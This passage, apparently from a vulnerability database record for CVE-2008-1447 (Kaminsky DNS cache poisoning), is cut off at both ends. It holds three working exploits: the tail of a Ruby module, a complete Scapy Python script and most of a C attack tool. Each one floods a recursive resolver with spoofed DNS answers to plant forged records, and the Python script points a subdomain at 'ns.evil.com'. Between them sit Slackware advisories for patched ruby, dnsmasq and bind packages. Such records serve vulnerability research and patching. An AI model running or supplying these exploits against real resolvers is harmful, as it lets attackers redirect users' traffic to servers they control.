#{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} 
queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "slackware": [{"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting 
slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New dnsmasq packages are available for Slackware 10.0, 10.1, 10.2, 11.0,\n12.0, 12.1, and -current to address possible DNS cache poisoning issues.\n\nMore details about this issue may be found in the 
Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz:\n Upgraded to dnsmasq-2.45.\n It was discovered that earlier versions of dnsmasq have DNS cache\n weaknesses that are similar to the ones recently discovered in BIND.\n This new release minimizes the risk of cache poisoning.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/dnsmasq-2.45-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/dnsmasq-2.45-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/dnsmasq-2.45-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/dnsmasq-2.45-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/dnsmasq-2.45-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.45-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.0 package:\ne1f567c3679e23ab3f80a86cec1343c4 dnsmasq-2.45-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\naabb7b9b872654b9b663014d49ba37c1 dnsmasq-2.45-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n41c8042baabfdbdeb7b59f2fd48cbc08 dnsmasq-2.45-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nfab50ae940bde92eabba0c062908ef42 dnsmasq-2.45-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb8e850a726270c0d7e305a7c6523ede4 dnsmasq-2.45-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n1c61011340f57e4179c788f3f0127dc0 dnsmasq-2.45-i486-1_slack12.1.tgz\n\nSlackware -current package:\n11fe1505a7177ec1a1c84a1b259b9c03 dnsmasq-2.45-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg dnsmasq-2.45-i486-1_slack12.1.tgz\n\nRestart dnsmasq:\n > sh /etc/rc.d/rc.dnsmasq restart", "modified": "2008-07-24T00:02:47", "published": "2008-07-24T00:02:47", "id": "SSA-2008-205-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.452680", "type": "slackware", "title": "[slackware-security] dnsmasq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. 
This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recurive resolvers with spoofed data. DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc693e1ae4997c7cc23c0051ec1c90796 bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n24326f563c6588a0541f3409bc7298cd bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n67178dd97006cf4cf3543704c82741b8 bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\na12c9e8304c5a7e285fa4df7d4b9756b bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n6209e4a5f9693451279b0d02795b9bd8 
bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne1c6d74c787fa3b7f3a5905fef206206 bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nd354a0118388bb0f3fd32fa79166746a bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n5b1087e6a0dc79ebf06144f44d5bb52f bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nda76550505d62f0d902b710a078d1020 bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nSlackware -current package:\nc255530e46f4cff8080a20b6c8d12443 bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning (Python)", "edition": 1, "published": "2008-07-24T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning (Python)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF", "href": "", "sourceData": "from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = \"X.X.X.X\"\n# Vulnerable recursive DNS server\ntargetdns = \"X.X.X.X\"\n# Authoritative NS for the target domain\nsrcdns = [\"X.X.X.X\"]\n\n# Domain to play with\ndummydomain = \"\"\nbasedomain = \".example.com.\"\n# sub-domain to claim authority on\ndomain = \"sub.example.com.\"\n# Spoofed authoritative DNS for the sub-domain\nspoof=\"ns.evil.com.\"\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = \"a\" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, 
arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint \"Sending our reply from %s with TXID = %s for %s\" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint \"Successfully poisonned our target with a dummy record !!\"\n\t\t\tbreak\n\texcept:\n\t\tprint \"Poisonning failed\"\n\n# milw0rm.com [2008-07-24]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define 
_BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n 
exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, &len2, data);\n *len += len2;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, 
l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char 
*domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed 
replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = 